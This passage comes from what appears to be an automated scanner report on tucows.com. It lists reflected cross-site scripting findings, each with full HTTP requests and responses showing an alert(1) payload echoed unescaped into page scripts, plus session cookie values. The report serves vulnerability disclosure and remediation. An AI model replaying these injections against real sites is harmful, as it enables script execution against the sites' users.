Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.318. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.319. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.320. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.321. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.322. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.323. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.324. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.325. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.326. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.327. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.328. http://www.tucows.com/images/newassets/search.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
